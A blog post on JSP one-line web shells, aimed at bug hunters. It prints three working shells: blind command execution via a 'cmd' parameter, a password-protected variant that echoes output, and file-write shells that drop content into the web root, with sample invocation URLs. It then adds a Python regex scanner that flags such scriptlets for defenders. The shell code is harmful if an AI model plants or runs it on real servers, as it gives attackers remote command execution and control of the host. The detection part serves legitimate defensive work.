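JSP One-Line Web Shells

Author: const27 Category: All, JSP Security Published: 2020-06-18 16:04

I keep running into JSP sites while bug hunting, so JSP one-line web shells are something you really ought to know.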

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
Command execution with no output returned
http://127.0.0.1/shell.jsp?cmd=calc
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
Password-protected one-liner that returns the command output
http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
<%
    // ISO-8859-1 input
    new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("content").getBytes());
    // UTF-8 input
    new java.io.FileOutputStream(request.getParameter("file")).write(new String(request.getParameter("content").getBytes("ISO-8859-1"), "UTF-8").getBytes());
    // Write into the web directory
    new java.io.FileOutputStream(application.getRealPath("/") + "/" + request.getParameter("filename")).write(request.getParameter("content").getBytes());
    // Write with richer functionality
    new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("content").getBytes());
%>
File write
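
Seen from the defender's side, all three shells above share one shape: a scriptlet reads request.getParameter and hands the value to Runtime.exec or to a file-writing constructor. The Python scanner below is an added example, not code from the original post; its function names and the benign sample are assumptions made here, and it is a triage heuristic that will also flag legitimate upload handlers.

```python
import re
from pathlib import Path

# Sinks used by the three shells on this page: command execution and file write.
SINKS = {
    "command-exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
    "file-write": re.compile(r"new\s+(?:java\.io\.)?(?:FileOutputStream|RandomAccessFile)\s*\("),
}
SOURCE = re.compile(r"request\s*\.\s*getParameter\s*\(")
# Scriptlets and expressions; directives (<%@) and JSP comments (<%--) are skipped.
SCRIPTLET = re.compile(r"<%(?![@-])(.*?)%>", re.S)

def scan_jsp(text):
    """Return (line, sink_kind) for each sink inside a scriptlet that also reads
    a request parameter. Heuristic for triage, not proof of a web shell."""
    findings = []
    for block in SCRIPTLET.finditer(text):
        body = block.group(1)
        if not SOURCE.search(body):
            continue
        for kind, pattern in SINKS.items():
            for hit in pattern.finditer(body):
                # Line number of the sink, counted from the start of the file.
                line = text.count("\n", 0, block.start(1) + hit.start()) + 1
                findings.append((line, kind))
    return sorted(findings)

def scan_tree(root):
    """Scan .jsp, .jspx and similarly named files under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*.jsp*"):
        if path.is_file():
            found = scan_jsp(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report

# Sample inputs: the first three are taken (abbreviated) from the page, the last is constructed.
NO_ECHO = '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'
WITH_ECHO = '''<%
   if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    }
%>'''
FILE_WRITE = ('<% new java.io.FileOutputStream(request.getParameter("file"))'
              '.write(request.getParameter("content").getBytes()); %>')
BENIGN = '<%@ page contentType="text/html" %>\n<% String n = request.getParameter("n"); %>'

if __name__ == "__main__":
    for name in ("NO_ECHO", "WITH_ECHO", "FILE_WRITE", "BENIGN"):
        print(name, scan_jsp(globals()[name]))
```

Run scan_tree against the application's deployed web root and compare the hits with what the build actually shipped; a flagged file that is absent from the release artifact is the one to examine first.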
